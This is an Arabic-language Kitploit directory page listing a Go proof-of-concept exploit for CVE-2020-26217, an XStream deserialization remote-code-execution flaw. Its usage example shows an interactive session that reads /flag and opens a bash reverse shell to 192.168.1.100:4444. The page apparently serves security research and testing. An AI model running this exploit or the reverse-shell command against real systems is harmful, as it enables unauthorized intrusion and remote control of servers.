Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-26217-XStream — PoC لإلغاء تسلسل XStream (CVE-2020-26217) | Kitploit
أدوات/GitHubGitHub/kairo-one/cve-2020-26217-xstream
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubkairo-one/cve-2020-26217-xstream

CVE-2020-26217-XStream

PoC لإلغاء تسلسل XStream (CVE-2020-26217)

عرض المستودع
2منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2020-26217 XStream RCE

أداة استغلال ثغرة تنفيذ التعليمات البرمجية عن بُعد في XStream.

وصف الثغرة

CVE-2020-26217 هي ثغرة إلغاء تسلسل في مكتبة XStream، حيث يمكن للمهاجم تشغيل تنفيذ التعليمات البرمجية عن بُعد عبر إنشاء بيانات XML خبيثة.

الإصدارات المتأثرة: XStream <= 1.4.13

طريقة الاستخدام

root@kitploit:~
go run poc.go <目标URL>

مثال

root@kitploit:~
# 运行工具
go run poc.go http://target.com:8080/?data

# 进入交互模式后输入命令
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit

الميزات

  • تنفيذ أوامر تفاعلي
  • تحليل تلقائي لاسم معامل URL
  • ترميز Base64 لتجاوز فلترة الأحرف الخاصة
  • دعم HTTPS (تخطي التحقق من الشهادة)

البناء

root@kitploit:~
go build -o poc poc.go

إخلاء مسؤولية

هذه الأداة مخصصة لأغراض البحث الأمني والاختبار المصرح به فقط، ويُرجى عدم استخدامها لأغراض غير قانونية. يتحمل المستخدم كامل المسؤولية القانونية الناتجة عن ذلك.

تنزيل الأداة